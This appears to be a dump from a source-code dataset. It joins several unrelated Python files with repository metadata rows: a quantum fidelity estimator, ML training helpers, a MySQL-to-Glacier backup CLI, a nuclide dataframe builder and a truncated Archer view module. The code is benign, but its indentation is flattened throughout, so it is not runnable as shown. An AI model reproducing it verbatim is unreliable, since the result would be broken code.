# therefore, we assign an "eigenvalue weight" of 1 to non-identity 1-qubit Paulis (X, Y, Z) and an "eigenvalue weight" of 0 to the 1-qubit identity
# we then write the nq-qubit Pauli string W as an array of above weights w_1w_2...w_nq, where w_i is the "eigenvalue weight" of the ith Pauli in W
# then the computational basis state |i_1i_2...i_nq> has the eigenvalue (-1)^(i_1*w_1 + ... + i_nq*w_nq) when it has been transformed to an
# however, if the Pauli operator has a non-identity phase, the +1 and -1 eigenvalue are appropriately changed
# the general expression for eigenvalue takes the form phase * (-1)^(i_1*w_1 + ... + i_nq*w_nq)
# eigenstate of the Pauli operator W (using the transform_matrix defined in qi_utilities.generate_POVM)
# so given a pauli index (a number from 0 to 4^nq - 1), obtain the array of "eigenvalue weight" representing the Pauli operator as described above
# for this, convert the pauli index to an array of 0, 1, 2, 3 representing the Pauli operator (using np.base_repr, np.array), then set non-zero elements to 1 (using np.where)
pauli_eigval_weight = lambda pauli_index: np.where(np.array(list(np.base_repr(pauli_index, base = 4).rjust(nq, '0')), dtype = 'int8') == 0, 0, 1)
# get array of 0, 1 representing the computational basis element from the index (a number from 0 to 2^nq - 1) of the computational basis
computational_basis_array = lambda computational_basis_index: np.array(list(np.base_repr(computational_basis_index, base = 2).rjust(nq, '0')), dtype = 'int8')
# for the eigenvalues from the (computational basis) index of the outcome for each pauli measurement performed
# to convert the eigenvalue (+1 or -1) to index (0 or 1, respectively), we do the operation (1 - e) / 2, where e is the eigenvalue
# type-casted to integers because an index is expected as for each outcome
data = [int(np.real( (1 - phase*(-1)**(computational_basis_array(outcome_index).dot(pauli_eigval_weight(pauli_index)))) / 2 )) for outcome_index in data]
if flip_outcomes and actual_phase == -1:
# now that we have the data for the effective POVM (without considering the phase), we can flip the outcomes as necessary
data = [1 - outcome_index for outcome_index in data]
# include this in the list of outcomes for the effective measurement
effective_outcomes.extend(data)
return effective_outcomes
def fidelity_estimation_pauli_random_sampling(target_state = 'random', nq = 2, num_povm_list = 2, R = 100, epsilon = 0.05, risk = None, epsilon_o = 1e-5, noise = True,\
noise_type = 'depolarizing', state_args = None, flip_outcomes = False, tol = 1e-6, random_seed = 1, verify_estimator = False,\
print_result = True, write_to_file = False, dirpath = './Data/Computational/', filename = 'temp'):
"""
Generates the target_state defined by 'target_state' and state_args, and finds an estimator for fidelity using Juditsky & Nemirovski's approach for a specific measurement scheme
involving random sampling of Pauli operators.
The specialized approach allows for computation of the estimator for very large dimensions.
The random sampling is done as per the probability distribution p_i = |tr(W_i rho)| / \sum_i |tr(W_i rho)|, where W_i is the ith Pauli operator and rho is the target state.
This random sampling is accounted for by a single POVM, so number of types of measurement (N) is just one.
The estimator and the risk only depend on the dimension, the number of repetitions, the confidence level, and the normalization factor NF = \sum_i |tr(W_i rho)|.
If risk is a number less than 0.5, the number of repetitions of the minimax optimal measurement is chosen so that the risk of the estimator is less than or equal to the given risk.
The argument R is ignored in this case.
Checks are not performed to ensure that the given set of generators indeed form generators.
If verify_estimator is true, the estimator constructed for the special case of randomized Pauli measurement strategy is checked with the general construction
for Juditsky & Nemirovski's estimator.
"""
# set the random seed once here and nowhere else
if random_seed:
np.random.seed(int(random_seed))
# number of qubits
nq = int(nq)
# dimension of the system
n = int(2**nq)
### create the states
# create the target state from the specified generators
target_state = str(target_state).lower()
if target_state in ['ghz', 'w', 'cluster']:
state_args_dict = {'ghz': {'d': 2, 'M': nq}, 'w': {'nq': nq}, 'cluster': {'nq': nq}}
rho = generate_special_state(state = target_state, state_args = state_args_dict[target_state], density_matrix = True,\
flatten = True, isComplex = True)
elif target_state == 'stabilizer':
generators = state_args['generators']
# if generators are specified using I, X, Y, Z, convert them to 0, 1, 2, 3
generators = [g.lower().translate(str.maketrans('ixyz', '0123')) for g in generators]
rho = generate_special_state(state = 'stabilizer', state_args = {'nq': nq, 'generators': generators}, density_matrix = True, flatten = True, isComplex = True)
elif target_state == 'random':
rho = generate_random_state(n = n, pure = True, density_matrix = True, flatten = True, isComplex = True, verify = False, random_seed = None)
else:
raise ValueError("Please specify a valid target state. Currently supported arguments are GHZ, W, Cluster, stabilizer and random.")
# apply noise to the target state to create the actual state ("prepared in the lab")
if not ((noise is None) or (noise is False)):
# the target state decoheres due to noise
if type(noise) in [int, float]:
if not (noise >= 0 and noise <= 1):
raise ValueError("noise level must be between 0 and 1")
sigma = depolarizing_channel(rho, p = noise)
else:
sigma = depolarizing_channel(rho, p = 0.1)
else:
sigma = generate_random_state(n, pure = False, density_matrix = True, flatten = True, isComplex = True, verify = False,\
random_seed = None)
### generate the measurement outcomes for the effective (minimax optimal) POVM
# calculate the normalization factor
# computing each Pauli operator individulally (as opposed to computing a list of all Pauli operators at once) is a little slower, but can handle more number of qubits
NF = np.sum([np.abs(np.conj(rho).dot(generate_Pauli_operator(nq = nq, index_list = pauli_index, flatten = True)[0])) for pauli_index in range(1, 4**nq)])
# if risk is given, then choose the number of repetitions to achieve that risk (or a slightly lower risk)
if risk is not None:
if risk < 0.5:
R = int(np.ceil(2*np.log(2/epsilon) / np.abs(np.log(1 - (n/NF)**2 * risk**2))))
else:
raise ValueError("Only risk < 0.5 can be achieved by choosing appropriate number of repetitions of the minimax optimal measurement.")
effective_outcomes = generate_sampled_pauli_measurement_outcomes(rho, sigma, R, num_povm_list, epsilon_o, flip_outcomes)
### obtain the fidelity estimator
PSFEM = Pauli_Sampler_Fidelity_Estimation_Manager(n, R, NF, epsilon, epsilon_o, tol)
fidelity_estimator, risk = PSFEM.find_fidelity_estimator()
# obtain the estimate
estimate = fidelity_estimator(effective_outcomes)
# verify the estimator created for the specialized case using the general approach
if verify_estimator:
# the effective POVM for the optimal measurement strategy is simply {omega_1 rho + omega_2 Delta_rho, (1 - omega_1) rho + (1 - omega_2) Delta_rho},
# where omega_1 = (n + NF - 1)/2NF, omega_2 = (NF - 1)/2NF, and Delta_rho = I - rho
omega1 = 0.5 * (n + NF - 1) / NF
omega2 = 0.5 * (1 - 1/NF)
Delta_rho = np.eye(2**nq).ravel() - rho
POVM_list = [[omega1 * rho + omega2 * Delta_rho, (1 - omega1) * rho + (1 - omega2) * Delta_rho]]
# Juditsky & Nemirovski estimator
FEMC = Fidelity_Estimation_Manager_Corrected(R, epsilon, rho, POVM_list, epsilon_o, tol)
fidelity_estimator_general, risk_general = FEMC.find_fidelity_estimator()
# matrices at optimum
sigma_1_opt, sigma_2_opt = embed_hermitian_matrix_real_vector_space(FEMC.sigma_1_opt, reverse = True, flatten = True), embed_hermitian_matrix_real_vector_space(FEMC.sigma_2_opt, reverse = True, flatten = True)
# constraint at optimum
constraint_general = np.real(np.sum([np.sqrt((np.conj(Ei).dot(sigma_1_opt) + epsilon_o/2)*(np.conj(Ei).dot(sigma_2_opt) + epsilon_o/2)) / (1 + epsilon_o) for Ei in POVM_list[0]]))
if print_result:
print("True fidelity", np.real(np.conj(rho).dot(sigma)))
print("Estimate", estimate)
print("Risk", risk)
print("Repetitions", R)
# print results from the general approach
if verify_estimator:
print("Risk (general)", risk_general)
print("Constraint (general)", constraint_general, "Lower constraint bound", (epsilon / 2)**(1/R))
if not verify_estimator:
return PSFEM
else:
return (PSFEM, FEMC)
| 59.258457
| 226
| 0.643999
| 6,613
| 43,792
| 4.10313
| 0.109179
| 0.016805
| 0.007297
| 0.00796
| 0.33493
| 0.287131
| 0.24637
| 0.240142
| 0.221678
| 0.200855
| 0
| 0.022914
| 0.264546
| 43,792
| 738
| 227
| 59.338753
| 0.819573
| 0.547794
| 0
| 0.141667
| 0
| 0.020833
| 0.077275
| 0.00117
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.041667
| 0
| 0.145833
| 0.058333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c95c3a9b1e12620c6fdf7ce0fba7e46782237c62
| 2,054
|
py
|
Python
|
until.py
|
zlinao/COMP5212-project1
|
fa6cb10d238de187fbb891499916c6b44a0cd7b7
|
[
"Apache-2.0"
] | 3
|
2018-09-19T11:46:53.000Z
|
2018-10-09T04:48:28.000Z
|
until.py
|
zlinao/COMP5212-project1
|
fa6cb10d238de187fbb891499916c6b44a0cd7b7
|
[
"Apache-2.0"
] | null | null | null |
until.py
|
zlinao/COMP5212-project1
|
fa6cb10d238de187fbb891499916c6b44a0cd7b7
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 28 10:29:52 2018
@author: lin
"""
import numpy as np
import matplotlib.pyplot as plt
def accuracy(x,y,model):
a = model.predict(x,y)
a[a>=0.5]=1
a[a<0.5]=0
return np.sum(a==y)/len(a)
data1 = np.load("datasets/breast-cancer.npz")
data2 = np.load("datasets/diabetes.npz")
data3 = np.load("datasets/digit.npz")
data4 = np.load("datasets/iris.npz")
data5 = np.load("datasets/wine.npz")
def run_epoch(data, model, batch_size,lr):
epoch_size = (len(data["train_X"])//batch_size)+1
loss_total=0
for step in range(epoch_size):
if step == epoch_size-1:
input_data = data["train_X"][step*batch_size:,:]
labels = data["train_Y"][step*batch_size:]
else:
input_data = data["train_X"][step*batch_size:(step+1)*batch_size,:]
labels = data["train_Y"][step*batch_size:(step+1)*batch_size]
a = model.train(input_data,labels,lr)
loss = -np.sum(labels*np.log(a)+(1-labels)*np.log(1-a))
loss_total += loss
loss_avg = loss_total/len(data["train_X"])
acc = accuracy(data["train_X"],data["train_Y"],model)
#print("accuracy:",acc)
return loss_avg ,acc
def plot_loss_acc(loss,acc,i):
plt.figure(1+2*i)
plt.plot(loss,label='loss per epoch')
plt.title("dataset"+str(i+1)+" training loss")
plt.legend()
plt.xlabel('epoch_num')
plt.figure(2+2*i)
plt.plot(acc,color='orange',label='accuray per epoch')
plt.title("dataset"+str(i+1)+" training accuracy")
plt.legend()
plt.xlabel('epoch_num')
def sigmoid(x):
return 1/(1+np.exp(-x))
def choose_dataset(choice, config1):
if choice ==1:
config1.cancer()
elif choice ==2:
config1.diabetes()
elif choice ==3:
config1.digit()
elif choice ==4:
config1.iris()
elif choice ==5:
config1.wine()
else:
print("please choose the dataset number : 1-5")
return config1
| 25.358025
| 79
| 0.601266
| 313
| 2,054
| 3.840256
| 0.319489
| 0.0599
| 0.058236
| 0.006656
| 0.227953
| 0.227953
| 0.184692
| 0.168885
| 0.123128
| 0
| 0
| 0.034069
| 0.228335
| 2,054
| 80
| 80
| 25.675
| 0.72429
| 0.055988
| 0
| 0.109091
| 0
| 0
| 0.152411
| 0.024365
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.036364
| 0.018182
| 0.2
| 0.018182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c960f97df84624c96f4c85fc91f46edd0a467d9e
| 11,996
|
py
|
Python
|
dumpfreeze/main.py
|
rkcf/dumpfreeze
|
e9b18e4bc4574ff3b647a075cecd72977dc8f59a
|
[
"MIT"
] | 1
|
2020-01-30T17:59:50.000Z
|
2020-01-30T17:59:50.000Z
|
dumpfreeze/main.py
|
rkcf/dumpfreeze
|
e9b18e4bc4574ff3b647a075cecd72977dc8f59a
|
[
"MIT"
] | null | null | null |
dumpfreeze/main.py
|
rkcf/dumpfreeze
|
e9b18e4bc4574ff3b647a075cecd72977dc8f59a
|
[
"MIT"
] | null | null | null |
# dumpfreeze
# Create MySQL dumps and backup to Amazon Glacier
import os
import logging
import datetime
import click
import uuid
import sqlalchemy as sa
from dumpfreeze import backup as bak
from dumpfreeze import aws
from dumpfreeze import inventorydb
from dumpfreeze import __version__
logger = logging.getLogger(__name__)
def abort_if_false(ctx, param, value):
if not value:
ctx.abort()
@click.group()
@click.option('-v', '--verbose', count=True)
@click.option('--local-db', default='~/.dumpfreeze/inventory.db')
@click.version_option(__version__, prog_name='dumpfreeze')
@click.pass_context
def main(ctx, verbose, local_db):
""" Create and manage MySQL dumps locally and on AWS Glacier """
# Set logger verbosity
if verbose == 1:
logging.basicConfig(level=logging.ERROR)
elif verbose == 2:
logging.basicConfig(level=logging.INFO)
elif verbose == 3:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.CRITICAL)
# Check if db exists, if not create it
expanded_db_path = os.path.expanduser(local_db)
if not os.path.isfile(expanded_db_path):
inventorydb.setup_db(expanded_db_path)
# Create db session
db_engine = sa.create_engine('sqlite:///' + expanded_db_path)
Session = sa.orm.sessionmaker(bind=db_engine)
ctx.obj['session_maker'] = Session
return
# Backup operations
@click.group()
@click.pass_context
def backup(ctx):
""" Operations on local backups """
pass
@backup.command('create')
@click.option('--user', default='root', help='Database user')
@click.option('--backup-dir',
default=os.getcwd(),
help='Backup storage directory')
@click.argument('database')
@click.pass_context
def create_backup(ctx, database, user, backup_dir):
""" Create a mysqldump backup"""
backup_uuid = uuid.uuid4().hex
try:
bak.create_dump(database, user, backup_dir, backup_uuid)
except Exception as e:
logger.critical(e)
raise SystemExit(1)
today = datetime.date.isoformat(datetime.datetime.today())
# Insert backup info into backup inventory db
backup_info = inventorydb.Backup(id=backup_uuid,
database_name=database,
backup_dir=backup_dir,
date=today)
local_db = ctx.obj['session_maker']()
backup_info.store(local_db)
click.echo(backup_uuid)
@backup.command('upload')
@click.option('--vault', required=True, help='Vault to upload to')
@click.argument('backup_uuid', metavar='UUID')
@click.pass_context
def upload_backup(ctx, vault, backup_uuid):
""" Upload a local backup dump to AWS Glacier """
# Get backup info
local_db = ctx.obj['session_maker']()
try:
query = local_db.query(inventorydb.Backup)
backup_info = query.filter_by(id=backup_uuid).one()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# Construct backup path
backup_file = backup_info.id + '.sql'
backup_path = os.path.join(backup_info.backup_dir, backup_file)
# Upload backup_file to Glacier
try:
upload_response = aws.glacier_upload(backup_path, vault)
except Exception as e:
logger.critical(e)
raise SystemExit(1)
archive_uuid = uuid.uuid4().hex
# Insert archive info into archive inventory db
archive_info = inventorydb.Archive(id=archive_uuid,
aws_id=upload_response['archiveId'],
location=upload_response['location'],
vault_name=vault,
database_name=backup_info.database_name,
date=backup_info.date)
local_db = ctx.obj['session_maker']()
archive_info.store(local_db)
click.echo(archive_uuid)
@backup.command('restore')
@click.option('--user', default='root', help='Database user')
@click.argument('backup_uuid', metavar='UUID')
@click.pass_context
def restore_backup(ctx, user, backup_uuid):
""" Restore a backup to the database """
# Get backup info
local_db = ctx.obj['session_maker']()
try:
query = local_db.query(inventorydb.Backup)
backup_info = query.filter_by(id=backup_uuid).one()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# Restore backup to database
bak.restore_dump(backup_info.database_name,
user,
backup_info.backup_dir,
backup_info.id)
@backup.command('delete')
@click.argument('backup_uuid', metavar='UUID')
@click.option('--yes',
'-y',
is_flag=True,
callback=abort_if_false,
expose_value=False,
prompt='Delete backup?')
@click.pass_context
def delete_backup(ctx, backup_uuid):
""" Delete a local dump backup """
# Get backup info
local_db = ctx.obj['session_maker']()
try:
query = local_db.query(inventorydb.Backup)
backup_info = query.filter_by(id=backup_uuid).one()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# Construct backup path
backup_file = backup_info.id + '.sql'
backup_path = os.path.join(backup_info.backup_dir, backup_file)
# Delete file
os.remove(backup_path)
# Remove from db
local_db = ctx.obj['session_maker']()
backup_info.delete(local_db)
click.echo(backup_info.id)
@backup.command('list')
@click.pass_context
def list_backup(ctx):
""" Return a list of all local backups """
# Get Inventory
local_db = ctx.obj['session_maker']()
try:
backups = local_db.query(inventorydb.Backup).all()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# do some formatting for printing
formatted = []
for backup in backups:
formatted.append([backup.id,
backup.database_name,
backup.backup_dir,
backup.date])
# Add header
formatted.insert(0, ['UUID', 'DATABASE', 'LOCATION', 'DATE'])
# Calculate widths
widths = [max(map(len, column)) for column in zip(*formatted)]
# Print inventory
for row in formatted:
print(" ".join((val.ljust(width)
for val, width in zip(row, widths))))
# Archive operations
@click.group()
@click.pass_context
def archive(ctx):
""" Operations on AWS Glacier Archives """
pass
@archive.command('delete')
@click.argument('archive_uuid', metavar='UUID')
@click.option('--yes',
'-y',
is_flag=True,
callback=abort_if_false,
expose_value=False,
prompt='Delete archive?')
@click.pass_context
def delete_archive(ctx, archive_uuid):
""" Delete an archive on AWS Glacier """
# Get archive info
local_db = ctx.obj['session_maker']()
try:
query = local_db.query(inventorydb.Archive)
archive_info = query.filter_by(id=archive_uuid).one()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# Send delete job to AWS
aws.delete_archive(archive_info)
# Remove from db
local_db = ctx.obj['session_maker']()
archive_info.delete(local_db)
click.echo(archive_uuid)
@archive.command('retrieve')
@click.argument('archive_uuid', metavar='UUID')
@click.pass_context
def retrieve_archive(ctx, archive_uuid):
""" Initiate an archive retrieval from AWS Glacier """
# Get archive info
local_db = ctx.obj['session_maker']()
try:
query = local_db.query(inventorydb.Archive)
archive_info = query.filter_by(id=archive_uuid).one()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# Initiate archive retrieval job
job_response = aws.retrieve_archive(archive_info)
# Insert backup info into backup inventory db
job_info = inventorydb.Job(account_id=job_response[0],
vault_name=job_response[1],
id=job_response[2])
local_db = ctx.obj['session_maker']()
job_info.store(local_db)
@archive.command('list')
@click.pass_context
def list_archive(ctx):
""" Return a list of uploaded archives """
# Get inventory
local_db = ctx.obj['session_maker']()
try:
archives = local_db.query(inventorydb.Archive).all()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# do some formatting for printing
formatted = []
for archive in archives:
formatted.append([archive.id,
archive.vault_name,
archive.database_name,
archive.date])
# Add header
formatted.insert(0, ('UUID', 'VAULT', 'DATABASE', 'DATE'))
# Calculate widths
widths = [max(map(len, column)) for column in zip(*formatted)]
# Print inventory
for row in formatted:
print(" ".join((val.ljust(width)
for val, width in zip(row, widths))))
@click.command('poll-jobs')
@click.pass_context
def poll_jobs(ctx):
""" Check each job in job list, check for completion,
and download job data
"""
# Get job list
local_db = ctx.obj['session_maker']()
try:
job_list = local_db.query(inventorydb.Job).all()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
# Check for job completion
for job in job_list:
logger.info('Checking job %s for completion', job.id)
if aws.check_job(job):
logger.info('Job %s complete, getting data', job.id)
# Pull archive data
backup_data = aws.get_archive_data(job)
# Store backup data as new file
backup_dir = os.getcwd()
backup_uuid = uuid.uuid4().hex
backup_file = backup_uuid + '.sql'
backup_path = os.path.join(backup_dir, backup_file)
with open(backup_path, 'w') as f:
f.write(backup_data)
# Get corrosponding archive data
archive_id = aws.get_job_archive(job)
local_db = ctx.obj['session_maker']()
try:
query = local_db.query(inventorydb.Archive)
archive_info = query.filter_by(aws_id=archive_id).one()
except Exception as e:
logger.critical(e)
local_db.rollback()
raise SystemExit(1)
finally:
local_db.close()
database_name = archive_info.database_name
backup_date = archive_info.date
# Insert backup info into backup inventory db
backup_info = inventorydb.Backup(id=backup_uuid,
database_name=database_name,
backup_dir=backup_dir,
date=backup_date)
local_db = ctx.obj['session_maker']()
backup_info.store(local_db)
# Delete job from db
local_db = ctx.obj['session_maker']()
job.delete(local_db)
click.echo(backup_uuid)
main.add_command(backup)
main.add_command(archive)
main.add_command(poll_jobs, name='poll-jobs')
main(obj={})
| 29.766749
| 79
| 0.614288
| 1,449
| 11,996
| 4.906832
| 0.135266
| 0.05218
| 0.031083
| 0.043038
| 0.54135
| 0.501266
| 0.481013
| 0.419409
| 0.407032
| 0.372855
| 0
| 0.002541
| 0.278343
| 11,996
| 402
| 80
| 29.840796
| 0.818759
| 0.11879
| 0
| 0.562278
| 0
| 0
| 0.06948
| 0.002488
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046263
| false
| 0.049822
| 0.035587
| 0
| 0.085409
| 0.007117
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96260912cab6b5833f970ad06a26821cebe5439
| 886
|
py
|
Python
|
01-tapsterbot/click-accuracy/makeTestData.py
|
AppTestBot/AppTestBot
|
035e93e662753e50d7dcc38d6fd362933186983b
|
[
"Apache-2.0"
] | null | null | null |
01-tapsterbot/click-accuracy/makeTestData.py
|
AppTestBot/AppTestBot
|
035e93e662753e50d7dcc38d6fd362933186983b
|
[
"Apache-2.0"
] | null | null | null |
01-tapsterbot/click-accuracy/makeTestData.py
|
AppTestBot/AppTestBot
|
035e93e662753e50d7dcc38d6fd362933186983b
|
[
"Apache-2.0"
] | null | null | null |
import csv
FLAGS = None
def main():
with open('dataset/test.csv', 'w') as csv_file:
writer = csv.writer(csv_file, delimiter=',')
#for w in range(-FLAGS.width, FLAGS.width+1i):
w = -60
while w <= 60:
h = -28
#for h in range(-FLAGS.height, FLAGS.height+1):
while h <=26:
writer.writerow([h, w])
h += 6.75
w = w + 7.5
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='make coordinate.csv for data')
parser.add_argument('--width', '-w', type=int,
required=False,
help='input width')
parser.add_argument('--height', '-t', type=int,
required=False,
help='input height')
FLAGS = parser.parse_args()
main()
| 28.580645
| 80
| 0.497743
| 103
| 886
| 4.15534
| 0.504854
| 0.03271
| 0.056075
| 0.093458
| 0.135514
| 0.135514
| 0
| 0
| 0
| 0
| 0
| 0.026738
| 0.366817
| 886
| 30
| 81
| 29.533333
| 0.736185
| 0.102709
| 0
| 0.086957
| 0
| 0
| 0.121212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.086957
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96277ac68a88dc09c944967b21d05e1368096d4
| 3,546
|
py
|
Python
|
CreateBigDataFrame.py
|
ezsolti/MVA_PWR_data
|
3e64c5b1bd643d5ba5d6e275b426d601cff7b270
|
[
"MIT"
] | 2
|
2022-02-04T10:47:37.000Z
|
2022-03-15T13:03:19.000Z
|
CreateBigDataFrame.py
|
ezsolti/MVA_PWR_data
|
3e64c5b1bd643d5ba5d6e275b426d601cff7b270
|
[
"MIT"
] | null | null | null |
CreateBigDataFrame.py
|
ezsolti/MVA_PWR_data
|
3e64c5b1bd643d5ba5d6e275b426d601cff7b270
|
[
"MIT"
] | 1
|
2022-01-13T15:55:17.000Z
|
2022-01-13T15:55:17.000Z
|
"""
Script to create dataframe from serpent bumat files
including all the nuclides.
Zsolt Elter 2019
"""
import json
import os
with open ('nuclides.json') as json_file:
nuclidesDict = json.load(json_file)
#final name of the file
dataFrame='PWR_UOX-MOX_BigDataFrame-SF-GSRC-noReactorType.csv'
def readInventory(filename):
"""Function to read Serpent bumat files
Parameter
---------
filename : str
path to the bumatfile to be read
Returns
-------
inventory : dict
dictionary to store the inventory. keys are ZAID identifiers (str), values
are atom densities (str) in b^{-1}cm^{-1}
"""
mat=open(filename)
matfile=mat.readlines()
mat.close()
inventory={}
for line in matfile[6:]:
x=line.strip().split()
inventory[x[0][:-4]]=x[1]
return inventory
#header of file
dataFrameStr=',BU,CT,IE,fuelType,TOT_SF,TOT_GSRC,TOT_A,TOT_H'
for nuclIDi in nuclidesDict.values():
dataFrameStr=dataFrameStr+',%s'%nuclIDi #here we add the nuclide identifier to the header!
dataFrameStr=dataFrameStr+'\n'
#header ends
f = open(dataFrame,'w')
f.write(dataFrameStr)
f.close()
#let's open the file linking to the outputs
csv=open('file_log_PWR_UOX-MOX.csv').readlines()
depfileOld=''
for line in csv[1:]:
x=line.strip().split(',')
####SFRATE AND GSRC
if x[4]=='UOX':
deppath='/UOX/serpent_files/' #since originally I have not included a link to the _dep.m file, here I had to fix that
depfileNew='%s/IE%d/BU%d/sPWR_IE_%d_BU_%d_dep.m'%(deppath,10*float(x[3]),10*float(x[1]),10*float(x[3]),10*float(x[1])) #and find out from the BIC parameters
else: #the path to the _dep.m file...
deppath='/MOX/serpent_files/'
depfileNew='%s/IE%d/BU%d/sPWR_MOX_IE_%d_BU_%d_dep.m'%(deppath,10*float(x[3]),10*float(x[1]),10*float(x[3]),10*float(x[1]))
if depfileNew != depfileOld: #of course there is one _dep.m file for all the CT's for a given BU-IE, so we keep track what to open. And we only do it once
#things we grep here are lists!
TOTSFs=os.popen('grep TOT_SF %s -A 2'%depfileNew).readlines()[2].strip().split() #not the most time efficient greping, but does the job
TOTGSRCs=os.popen('grep TOT_GSRC %s -A 2'%depfileNew).readlines()[2].strip().split()
TOTAs=os.popen('grep "TOT_A =" %s -A 2'%depfileNew).readlines()[2].strip().split() #TOT_A in itself matches TOT_ADENS, that is why we need "" around it
TOTHs=os.popen('grep TOT_H %s -A 2'%depfileNew).readlines()[2].strip().split()
depfileOld=depfileNew
else:
depfileOld=depfileNew
####
inv=readInventory(x[-1]) #extract inventory from the outputfile
idx=int(x[-1][x[-1].find('bumat')+5:]) #get an index, since we want to know which value from the list to take
totsf=TOTSFs[idx]
totgsrc=TOTGSRCs[idx]
tota=TOTAs[idx]
toth=TOTHs[idx]
#we make a big string for the entry, storing all the columns
newentry=x[0]+','+x[1]+','+x[2]+','+x[3]+','+x[4]+','+totsf+','+totgsrc+','+tota+','+toth
for nucli in nuclidesDict.keys():
newentry=newentry+',%s'%(inv[nucli])
newentry=newentry+'\n'
#entry is created, so we append
f = open(dataFrame,'a')
f.write(newentry)
f.close()
#and we print just to see where is the process at.
if int(x[0])%1000==0:
print(x[0])
| 35.818182
| 164
| 0.620135
| 544
| 3,546
| 3.981618
| 0.363971
| 0.00831
| 0.029548
| 0.01108
| 0.141274
| 0.129271
| 0.129271
| 0.10988
| 0.048938
| 0.048938
| 0
| 0.02197
| 0.229836
| 3,546
| 98
| 165
| 36.183673
| 0.771146
| 0.335871
| 0
| 0.111111
| 0
| 0
| 0.156085
| 0.085538
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018519
| false
| 0
| 0.037037
| 0
| 0.074074
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c965792691ce7606e38e36d2ae95ee8c42d4351b
| 2,953
|
py
|
Python
|
archer_views.py
|
splunk-soar-connectors/archer
|
65b9a5e9e250b6407e3aad08b86a483499a6210f
|
[
"Apache-2.0"
] | null | null | null |
archer_views.py
|
splunk-soar-connectors/archer
|
65b9a5e9e250b6407e3aad08b86a483499a6210f
|
[
"Apache-2.0"
] | 1
|
2022-02-08T22:54:54.000Z
|
2022-02-08T22:54:54.000Z
|
archer_views.py
|
splunk-soar-connectors/archer
|
65b9a5e9e250b6407e3aad08b86a483499a6210f
|
[
"Apache-2.0"
] | null | null | null |
# File: archer_views.py
#
# Copyright (c) 2016-2022 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
def get_ticket(provides, all_results, context):
context['results'] = results = []
for summary, action_results in all_results:
for result in action_results:
parameters = result.get_param()
if 'context' in parameters:
del parameters['context']
rec = {'parameters': parameters}
data = result.get_data()
if data:
data = data[0]['Record']['Field']
rec['record'] = sorted(data, key=lambda x: (x['@name'] is not None, x['@name']))
rec['content_id'] = result.get_summary().get(
'content_id', 'Not provided')
results.append(rec)
return 'get_ticket.html'
def list_tickets(provides, all_results, context):
headers = ['application', 'content id']
context['results'] = results = []
headers_set = set()
for summary, action_results in all_results:
for result in action_results:
for record in result.get_data():
headers_set.update([f.get('@name', '').strip()
for f in record.get('Field', [])])
if not headers_set:
headers_set.update(headers)
headers.extend(sorted(headers_set))
final_result = {'headers': headers, 'data': []}
dyn_headers = headers[2:]
for summary, action_results in all_results:
for result in action_results:
data = result.get_data()
param = result.get_param()
for item in data:
row = []
row.append({'value': param.get('application'),
'contains': ['archer application']})
row.append({'value': item.get('@contentId'),
'contains': ['archer content id']})
name_value = {}
for f in item.get('Field', []):
name_value[f['@name']] = f.get('#text')
for h in dyn_headers:
if h == 'IP Address':
row.append({'value': name_value.get(h, ''),
'contains': ['ip']})
else:
